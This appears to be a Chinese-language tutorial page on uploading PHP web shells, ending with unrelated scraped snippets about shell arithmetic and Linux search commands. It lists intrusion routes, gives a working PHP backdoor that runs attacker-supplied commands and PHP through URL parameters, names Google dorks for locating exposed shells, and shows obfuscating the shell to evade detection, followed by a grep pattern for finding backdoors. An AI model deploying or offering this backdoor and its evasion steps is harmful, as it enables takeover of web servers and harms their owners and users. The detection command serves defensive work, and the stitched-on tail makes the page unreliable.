一些上傳web shell的方法
1. 本地檔案包含漏洞-攻擊者可以通過資料夾遍歷特性
2. 遠端命令執行或命令注入-如果**接收額外的字串,輸入的字串作為web伺服器上執行命令的引數
3. sqli-攻擊者活動web管理員的username/password後,他可以使用管理許可權來訪問管理面板,並且可以上傳後門
4. sniff
5. 暴力破解-暴力破解ftp/ssh來獲得訪問
6. 跨站指令碼
7. 社會工程
8. 遠端檔案包含
下面**執行攻擊者執行*nix命令:
<?php
if(isset($_get['shell'])) echo("".shell_exec($_get['shell']." &")."
");
if(isset($_get['php'])) echo(eval(stripcslashes($_get['php'])));
if(isset($_get['echo'])) echo($_get['echo']);
?>
儲存**為bb.php,上傳到web伺服器,我們需要在末尾新增?shell=來執行類似下面的命令
未受保護的後門可以輕鬆的由google dork找到:inurl:r57.php, intitle: magiccoder | version x70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.php等。
一些一些後門可以被發現所有有些攻擊者使用php編碼器。有乙個新的php編碼器叫carbylamine可以使c99和r57不會輕易被發現。carbylamine很簡單。[color=red]php carbylamine.php [/color]
例如,編碼bb.php,命名為encode.php:
php carbylamine.php bb.php encoded.php
[img]
encoded.php的樣品:
<?php function kjnpcp($xzk)
{$xzk=gzinflate(base64_decode($xzk));
for($i=0;$i
[color=blue][b]查詢/刪除後門[/b][/color]
[color=blue]grep -rpn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval) *(" /var/www[/color]
Shell中的算術運算 譯
儘管shell中的變數被預設地看做是string型別,而非number,但是shell本身仍然支援算術運算。主要有以下5種方式。n 6 3 echo n 6 3 declare i n 將n宣告為乙個整數 integer n 6 3 echo n 2 z 5 z expr z 1 加號 兩邊要有空格...
常用 shell 查詢
對一些經常用到的 shell 命令做簡要的總結,方便日後查閱。tcpdump命令用來儲存和記錄網路流量,即抓包工具。你可以用它來觀察網路上發生了什麼,並可用來解決各種各樣的問題,包括和網路通訊無關的問題。tcpdump 中的關鍵字主要有以下幾種 1.關於型別的關鍵字主要包括 host net por...
shell查詢命令大全
1.whereis 檔名 特點 快速,但是是模糊查詢,例如 找 whereis mysql 它會把mysql,mysql.ini,mysql.所在的目錄都找出來.一般的查詢都用這條命令.2.find name 檔名 特點 準確,但速度慢,消耗資源大,例如我想找到php.ini的準確位置,就需要用 f...